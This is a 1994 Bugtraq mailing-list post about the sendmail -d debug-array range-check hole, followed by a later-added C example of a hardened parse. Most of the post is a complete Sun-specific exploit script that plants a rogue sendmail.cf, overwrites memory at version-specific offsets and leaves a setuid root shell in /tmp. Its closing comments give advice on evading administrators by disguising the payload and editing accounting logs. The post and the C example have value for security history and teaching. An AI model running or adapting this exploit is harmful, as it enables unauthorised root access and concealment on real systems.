Bugtraq mailing list archives
Re: Latest sendmail bug?
From: widnerm () hsd utc com (Michael R. Widner)
Date: 20 Jul 1994 10:17:04 -0400 (EDT)
In a previous message, Doug McLaren said:
| > Does anyone have an exploit script we can use to test yet?
| > The worst bug exploits sendmail -d and can be used to gain root
| > according to CERT.
|
| an exploit script was posted to this list a few months back.

Um, I checked and never found said script.
The last sendmail -d hole script was posted somewhere back around March I believe. I've seen several different varieties, each of which has its strong points and weaknesses as an exploit script. The important thing to know is that if your sendmail crashes when you pass it something like -d387654321 then it can most likely be exploited to gain root access.

Without going into much detail, -dx.y writes y into the debug array as array[x]=y. Range checking is not performed properly on x, so it's possible to pass negative integers that pass the range check. Find a key location before the debug array, overwrite it, and you're in business. The problem in trying to create a generic script is that the 'key' locations have different offsets from the debug array for every version of sendmail. Sometimes they're easy to locate if you can get a core, but sometimes it is tough to get a core w/o already being root. Also, sometimes a core tells you nothing.

The following script is Sun specific, and patches are now available for all versions of Sun sendmail. The script creates a suid root owned copy of /bin/sh and places it in /tmp. If you're hacking solaris, I'd suggest you choose some program other than /bin/sh.

For the curious and paranoid, the uuencoded script is a compiled, compressed, and uuencoded version of the following c prog, compiled under sunos.

    main()
    {
        setuid(0);
        chown("/tmp/newsh", 0, 0);
        chmod("/tmp/newsh", 04755);
        exit(0);
    }

I put it in this way because solaris lacks a bundled compiler. Of course, I may be lying. It may really be a uuencoded program that does main() { unlink("/"); }, but you'll just have to trust me.

I should point out that Sun sendmail is in no way unique in its vulnerability to this hole. It's also worth noting, for Solaris administrators and hackers, that the normal Solaris patch procedure will leave the old (pre-patched) versions of sendmail in their broken and SUID state under /var/sadm/patch. This should be fixed, if you haven't done it already.

--
Michael R. Widner <widnerm () hsd utc com>

---------------------------
#!/bin/sh
# This script takes advantage of sendmail's (mis)interpretation of
# very large unsigned ints as signed ints when accessing the debug
# array.  As is, it will work with the 8 versions of sun sendmail
# that I have access to.  Perhaps I'll update it if I find new
# versions of sun sendmail.
# NOTE: This is a Sun specific script.  Don't expect it to work with
# any non-sun sendmail.
#   -Michael R. Widner (atreus) 3/25/94
#
# usage: smdhole [/path/to/suid/sendmail]
#
# add /usr/ucb to path so solaris can find `whoami` (4/18/94)
path=$path:/usr/ucb

if [ $1x = x ]; then
  sendmail=/usr/lib/sendmail
else
  echo "Trying to abuse $1."
  sendmail=$1
fi

sm_size=`echo \`ls -l $sendmail\` | cut -d" " -f4,5 | sed "s/[^0-9]//g"`
# prefix and suffix for -1 as unsigned integer.  Actually, this is
# off by two.  you figure out why.
prefix=42949
suffix=67297

case $sm_size in
132064)
  n1=${prefix}52864
  n2=${prefix}52865
  n3=${prefix}52866
  echo Patched solaris w/o mx.
  ;;
134752)  # ug! dropped a 0 before. fixed 4/18/94
  n1=${prefix}01656
  n2=${prefix}01657
  n3=${prefix}01658
  echo Patched solaris sendmail.mx
  ;;
130860)
  n1=${prefix}53016
  n2=${prefix}53017
  n3=${prefix}53018
  echo Un-patched solaris w/o mx.
  ;;
133548)  # ug! dropped a 0 before. fixed 4/18/94
  n1=${prefix}01808
  n2=${prefix}01809
  n3=${prefix}01810
  echo Un-patched solaris sendmail.mx
  ;;
139264)
  n1=${prefix}49609
  n2=${prefix}49610
  n3=${prefix}49611
  echo Sun 4.1.3 sendmail - could be either of two versions
  n4=${prefix}49265
  n5=${prefix}49266
  n6=${prefix}49267
  ;;
155648)
  n1=${prefix}46953
  n2=${prefix}46954
  n3=${prefix}46955
  echo Sun 4.1.3 sendmail.mx - could be either of two versions
  n4=${prefix}46609
  n5=${prefix}46610
  n6=${prefix}46611
  ;;
*)
  echo "I don't know what version of sendmail $sendmail is."
  echo -n "Look for other versions of sendmail[.mx] on the "
  echo "system and re-run this as:"
  echo "  $0 /path/to/another/suid/sendmail"
  echo
  echo "Let me see if I can suggest anything..."
  find /usr/lib /var/sadm/patch -name "*sendm*" -perm -4001 -ls 2>/dev/null
  exit 1
  ;;
esac

cat << EOM > /tmp/sendmail.cf
DMether
DRlocalhost
CRlocalhost
CDMailer-Daemon root daemon uucp
DlFrom \$g \$d
Do.:%@!^=/[]
Dq\$g\$?x (\$x)\$.
De\$j nothing
OA./aliases
OF0666
Og1
OL0
Oo
OPPostmaster
OQ.
Os
Ou1
T root daemon uucp
H?F?From: nobody
Mlocal, P=/tmp/in.telnet, F=flsSDFMmnP, S=10, R=20, A=mail -d \$u
Mprog, P=/tmp/in.telnet, F=lsDFMeuP, S=10, R=20, A=sh -c \$u
S0
R\$+  \$#local \$:\$1  just rewrite
EOM

cat $0 | sed "s:atreus::" | uudecode
uncompress /tmp/in.telnet.Z
chmod 755 /tmp/in.telnet
mkdir /tmp/mail
cp /tmp/sendmail.cf /tmp/mail
cp /bin/sh /tmp/newsh
chmod 666 /tmp/newsh
$sendmail -d${n1}.116,${n2}.109,${n3}.112 `whoami` <<EOF
test
EOF
if [ -x /tmp/newsh ]; then
  echo "Had the right offset for sendmail.cf.  Here's the result:"
else
  echo "Looks like I had the wrong sendmail.cf offset.  Fuckers."
  if [ ${n4}x = x ]; then
    echo "This version isn't what I thought it was."
    echo "Look for other suid sendmails and try this on them."
  else
    echo "I'm taking another stab with a different offset."
    $sendmail -d${n4}.116,${n5}.109,${n6}.112 `whoami` <<EOF
test
EOF
    echo "Here's the result:"
  fi
fi
rm /tmp/in.telnet
rm -r /tmp/mail
rm /tmp/sendmail.cf
ls -l /tmp/newsh
exit
# I'm calling this in.telnet for one reason.  It shows up in the acct logs
# as being run by root.  It will attract less attention if it's something
# normally run by root.  An alert admin will catch it anyway, because
# in.telnet is normally not associated with a tty.  The obvious fix, if you
# want to go undetected, would be to modify the acct files once you've
# become root.
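The range-check failure the post describes, shown as an added example written for this page (it is neither the post's script nor sendmail's source): the "x" in -dx.y accumulated into a 32-bit int with only an upper-bound check, beside a hardened parse that rejects the same input. TT_SIZE and the function names are assumptions; the sample value is the n1 the script uses for one Solaris build.

```c
#include <ctype.h>
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#define TT_SIZE 100   /* debug-flag table size: an assumption for this example */
/* Outcome of parsing the "x" in -dx.y: was it accepted, and which slot would be written. */
struct dbg_index { int accepted; long index; };

/* Vulnerable pattern, modelled on the post's description (not sendmail's code):
 * digits accumulate into a 32-bit int, so a decimal near 2^32 becomes negative,
 * and the only range check is an upper bound, which a negative value passes. */
struct dbg_index parse_index_vulnerable(const char *s)
{
    struct dbg_index r = { 0, 0 };
    uint32_t acc = 0;                              /* the 32-bit pattern the int held */
    while (isdigit((unsigned char)*s))
        acc = acc * 10u + (uint32_t)(*s++ - '0');
    int32_t i = (acc > (uint32_t)INT32_MAX)        /* reinterpret as signed without UB */
        ? (int32_t)(acc - (uint32_t)INT32_MAX - 1u) + INT32_MIN   /* i.e. acc - 2^32 */
        : (int32_t)acc;
    if (i >= TT_SIZE) i = TT_SIZE - 1;             /* clamps large values only... */
    r.accepted = 1;                                /* ...a negative i is used as-is */
    r.index = i;
    return r;
}

/* Hardened parse: digits only, overflow detected, range checked while still unsigned. */
struct dbg_index parse_index_fixed(const char *s)
{
    struct dbg_index r = { 0, 0 };
    char *end;
    if (!isdigit((unsigned char)*s)) return r;     /* no sign, no leading whitespace */
    errno = 0;
    unsigned long v = strtoul(s, &end, 10);
    if (errno == ERANGE || v >= TT_SIZE) return r; /* reject before any signed conversion */
    r.accepted = 1;
    r.index = (long)v;
    return r;
}

int main(void)
{
    const char *x = "4294952864";                  /* value the post's script passes as n1 */
    struct dbg_index v = parse_index_vulnerable(x), f = parse_index_fixed(x);
    printf("vulnerable: accepted=%d index=%ld\nfixed: accepted=%d index=%ld\n",
           v.accepted, v.index, f.accepted, f.index);
    return 0;
}
```

With the sample value the vulnerable parse accepts an index of -14432, a write well before the table, while the hardened parse refuses it.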